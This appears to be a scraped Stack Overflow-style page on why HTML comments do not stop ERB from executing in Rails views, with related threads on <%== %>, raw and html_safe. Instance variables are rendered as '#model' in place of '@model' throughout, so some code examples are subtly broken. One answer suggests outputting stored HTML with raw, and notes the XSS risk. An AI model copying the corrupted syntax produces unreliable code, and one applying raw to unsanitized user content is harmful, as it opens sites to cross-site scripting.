Why does commented-out ERB still throw errors? - ruby-on-rails

I have an HTML file in this format:
html
more html
<%= valid erb %>
<!--
<%= incomplete_erb_with_bugs %>
-->
But I still get an exception page, because of the buggy ERB. But shouldn't commenting that section out cause that part not to be read by the browser? Is there another HTML method for actually preventing the browser from reading code?


Because its not commented.
But shouldn't commenting that section out cause that part not to be
read by the browser?
The browser does not execute Ruby or ERB - the server does before it sends the resulting HTML document to the browser.
ERB is ruby code imbedded in a file that contains literal text. The interpreter does not care about anything except the code in "erb tags".
This is just literal text
<%# this is a ruby line comment - the code below is executed: %>
<% bar do %>
<%= foo %>
<% end %>
The rest is just placed in the buffer. This is just like PHP or any other embedded language.
So a HTML comment (or CSS or JS for that matter) does not effect the ERB interpreter in any way. The interpreter does not really know or care that its creating HTML.
Is there another HTML method for actually preventing the browser from reading code?
The browser does not execute Ruby code. It just builds a document from whatever you send in the response.
So use a ruby comment <%#= incomplete_erb_with_bugs %> which will prevent the code from being executed - and it will never get sent to the browser.


you're commenting out html, but the ruby code inside it still gets evaluated. you need to comment out the code, which is done like this:
<%#= incomplete_erb_with_bugs %>


you need to comment the actual line, not the html surrounding it
html
more html
<%= valid erb %>
<%= incomplete_erb_with_bugs %>
you can also use if statements
<% if false %>
<%#= incomplete_erb_with_bugs %>
<% end %>

Related

What is the difference between <%== %> and <%= %> in rails? [duplicate]

I saw this recently, thought it was interesting. But I don't really understand what it does?
Ex. I have a rails app and I want to bootstrap some json, so that I don't have to make a second request. Normally I would write something like this.
<%= raw #model.to_json %>
or
<%= #model.to_json.html_safe %>
I have to send the message raw or html_safe or the json will be html escaped and thus not parsed correctly. However, this seems to work too.
<%== #model.to_json %>
But I can't find any documentation.
Does anyone know what this does exactly? i.e. Is it the exact same as calling html_safe or raw? Or is there more to it?

<%== is equivalent to raw.
From the Ruby on Rails Guide:
To insert something verbatim use the raw helper rather than calling
html_safe:
<%= raw #cms.current_template %> <%# inserts #cms.current_template as is %>
or, equivalently, use <%==:
<%== #cms.current_template %> <%# inserts #cms.current_template as is %>

Rails actually uses Erubis instead of ERB, which supports a variety of other stuff.
<%== is exactly as you expect, though: It emits the value unescaped

Rails Template Inline Code not running

I have a ruby on rails html.erb file with inline code in it like below. However, the code doesn't always run when somebody loads the page. It only prints to stdout the first time the page is loaded.
<%puts "TESTING"%>
Does rails cache my html.erb pages somehow? Is there a way to turn it off?

If you want to output something you need to use <%= %> instead of <% %>
<%= "TESTING" %>
<%= %> - Evaluate and print the output
<% %> - only evaluate

Try below code:
<%= "TESTING" %>
<%= %> is used to print the text in html.erb file

What does <%== %> do in rails erb?

I saw this recently, thought it was interesting. But I don't really understand what it does?
Ex. I have a rails app and I want to bootstrap some json, so that I don't have to make a second request. Normally I would write something like this.
<%= raw #model.to_json %>
or
<%= #model.to_json.html_safe %>
I have to send the message raw or html_safe or the json will be html escaped and thus not parsed correctly. However, this seems to work too.
<%== #model.to_json %>
But I can't find any documentation.
Does anyone know what this does exactly? i.e. Is it the exact same as calling html_safe or raw? Or is there more to it?

<%== is equivalent to raw.
From the Ruby on Rails Guide:
To insert something verbatim use the raw helper rather than calling
html_safe:
<%= raw #cms.current_template %> <%# inserts #cms.current_template as is %>
or, equivalently, use <%==:
<%== #cms.current_template %> <%# inserts #cms.current_template as is %>

Rails actually uses Erubis instead of ERB, which supports a variety of other stuff.
<%== is exactly as you expect, though: It emits the value unescaped

RHTML displaying HTML tags on output

I have an RHTML view in Rails, where the output is coming from my MongoDB collection. The data is outputted correctly using an iteration block, but whenever I try and have HTML tags in my database, they are not rendered in the HTML output, instead they are just displayed.
<%
#posts.find().each do |post|
%>
<h1><%=post["name"]%></h1>
<p><%=post["body"] %></p>
<p><%=post["timestamp"]%></p>
<%
end
%>
But, for instance, if I had
<p>Test</p>
In my database, the tags would be rendered, instead of being printed.

This is a security precaution that is now built into Rails 3. It prevents XSS (cross-site scripting) issues.
If you add raw you'll get the output you want.
<% #posts.each do |post| %>
<h1><%=raw post["name"]%></h1>
<p><%=raw post["body"] %></p>
<p><%=raw post["timestamp"]%></p>
<% end %>
However, if you are storing user-created arbitrary HTML, I don't recommend you do this unless you are sanitizing the input prior to storing it in the database.
Edit:
Another option: Using the sanitize helper in place of raw, e.g. <%=sanitize post["name"], :tags => "p" %> to allow <p> tags.

Apart from raw and .html_safe, which give 100% trust to the user's input, you could also use sanitize to restrict only a number of tags that allowed.
<%= sanitize post["name"] $>
For the details, see: http://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html

Block comments in html.erb templates in rails

How do you comment out html mixed with ruby code?
some text <% ... %> more text <%= ... %>
something else
<% ... %>
In jsp it's real simple: <%-- ... --%>, but I'm unable to find any concise option in rails.
Simple html comments <!-- ... --> do not work: ruby code is still executed and yells errors.
There's an option to use if false with html comments, but it's quite verbose, not to mention IDEs doesn't support it.
There's also an option coming from pure ruby, which surprisingly works.
<%
=begin %>
... html and ruby code goes here
<%
=end %>
It's generally fine, except that it's verbose, weird-looking and none of ruby IDEs I know support it (yep, I like to comment/comment-out with one keystroke).
I'm curious, is there any 'official' of doing this in rails?
Thanks!

Use this for commenting single lines:
<%# your_ruby_code %>
For multiple lines, the following would work:
<% =begin %>
<% ruby_code %>
<% =end %>
What you said would work.

I wouldn't count as a solution, but perhaps enclosing the chunk between an
<% if false %>
...
<% end %>
or if you feel a little dirty, create a helper that simply outputs nothing.
I've never needed it, but I'm stumbled there seems to be no out-of-the-box solution for this.

The =begin approach is annoying because:
It doesn't work for mixed HTML and Ruby (or just HTML) that's on a single line
It's annoying to type
The <% if false %> approach works, but it looks weird and doesn't give anyone else who looks at your code a hint about your intentions.
My solution is as follows:
In application_helper.rb, add a method so:
def comment
end
Then in your view template, you can say:
<% comment do %>Some stuff that won't be rendered...<% end %>
This works because any Ruby method can take a block, but will silently ignore the passed-in block if your method doesn't include a yield.

<%#=
...commented
multiline
block...
%>

For block comments in templates, my text editor (Komodo) finds this variation on #Garfield's recommendation least obnoxious:
<%# A long multiline comment in a rails template ...
# line 2
# and so on ...
# %>

To comment out erb tags use the ruby comment hash symbol before the = sign in the opening tag
<p>
This is some text I want to keep
<%= #some_object.some_attribute %>
</p>
<p>
I want to keep this text but comment out the erb tag
<%#= #some_object.another_attribute %>
</p>
<!--
<p>
I want all of this text commented out including the erb tag
<%#= #some_object.some_attribute %>
</p>
-->
<!--
<p>
I just want this html commented out but I want to keep the erb tag
<%= #some_object.some_attribute %>
</p>
-->

Since you can use <% %> to put a ruby block, it can be certainly used to put in comments into it.
A simpler and elegant solution would look like...
<%
# See! I am a Ruby Comment
# And I am multi-line
# I look like a recognizable ruby comment block too
# and not so complex
# The only drawback with me is the Hash symbol you have to repeat
# But it's the norm, isn't it?
%>

After =begin you do not need to put %>
<%
=begin
code code code code code code
code code code code code code
code code code code code code
code code code code code code
=end %>

Just an addendum to some of the previous answers. I found the =begin/=end solution most useful, but for the sake of beauty I write it like so:
<%
=begin
<p>HTML will be ignored</p>
<%= 'and so will ruby' %>
<p>
<%= 'plus the whole block will be greyed in editor' %>
</p>
=end
%>
Note that since everything is ignored until the =end there is no need to close the =begin tag with %> or open the =end tag with <% (which has also been pointed out in an earlier answer)
I found this to be the most elegant solution to completely outcomment a block of mixed ruby and html code and have it greyed out in my editor as well, as opposed to the <% if false %> solution. Only drawback is that =begin and =end must be placed at the very beginning of the line..

Use a HEREDOC called comment
Pros:
Self-explanatory that this is a comment
Works for erb and HTML tags
Has ok syntax highlighting (as one long string)
Cons:
Weird 3 line closing syntax
No keyboard shortcuts
Code:
The opening tag can be
<% <<-COMMENT %>
the above closing erb tag is just for looks (to match the end),
but don't put anything else there, it may show up on the page
or
<%
<<-COMMENT
%>
Anything here won't run or show up in the browser
<P>
this will not be displayed in the browser
<strong> even in the developer's tools </strong>
</p>
<% 1_000_000_000_000.times do |count| %>
for the <%= count %>'th time, this won't run a trillion times,
this is all just a string
all of these %>, <%, <% end %>, end, do, <!--, won't cause any issues.
but the below opening erb tag is important (if you used any erb tags in the comment).
I have no clue why?
The closing tag
yes it needs to be 3 lines 😟.
I don't know why the opening erb tag is important but it is! (unless you didn't use any erb tags in the comment).
<%
COMMENT
%>

You have to bear in mind where the code is executed. Ruby-style comments work because the Ruby code is executed on the server before it is served to the web browser. This also explains why HTML comments do not work—the Ruby has already been executed.
Doesn't the IDE you're using support creating custom macros for commenting out blocks of code?

You can use both <%if false%> and HTML comments at the same time:
<%if false%><--
stuff to comment out
--><%end%>
The benefits are:
Ruby code is not executed
The commented block has gray color in IDE
The intention is obvious for other developers

Sublime Text's block comment shortcut ctrl+shift+/ notices whether you've selected normal HTML or an Erb tag and puts either the <!--- or <%
=begin %> accordingly.

This is the onlyone that worked for me.
<%
=begin %>
code code code code code code
code code code code code code
code code code code code code
code code code code code code
=end %>

<% %w(
<span title="<%= title %>">hello</span>
) %>
I hope I've just blown your minds!

One way
This is my preferred way.
<%# START COMMENTED OUT SECTION %>
<%if false%><--
your view code here....
--><%end%>
<%# END COMMENTED OUT SECTION %>
You might say, why on earth would you want massive caps locks sentences in your code? The answer is because it's easy to forget (or simply not know) what <%if false%><-- is doing, or what --><%end%> is doing. A sleepy or uncaffeinated developer could easily delete them thinking they were typos, which would not be good! That's why I try to be kind to myself/other developers and make it super obvious. It's not succinct or pretty, but it's very practical and almost foolproof.
Second way
This method is great for being:
Simple
Not idiosyncratic (i.e. uses normally formatted ruby)
Expressive: conveys the meaning of what's happening (someone can easily figure out what it's doing)
Minimal
And here it is:
<%#
multiple
lines
commented
out
%>

The only acceptable solution I ever found to this back-breaking problem was to put a space within the "<%=" to make it no longer register as ruby code, and then comment out the whole block with html comments
Like this:
<!--
<p>
< %= #some_object.some_attribute %>
</p>
<p>
< %= #some_object.another_attribute %>
</p>
<p>
< %= #some_object.some_attribute %>
</p>
<p>
< %= #some_object.some_attribute %>
</p>
-->
Yes, adding the spaces is annoying. But it is the least annoying of all the solutions I've yet seen.

Resources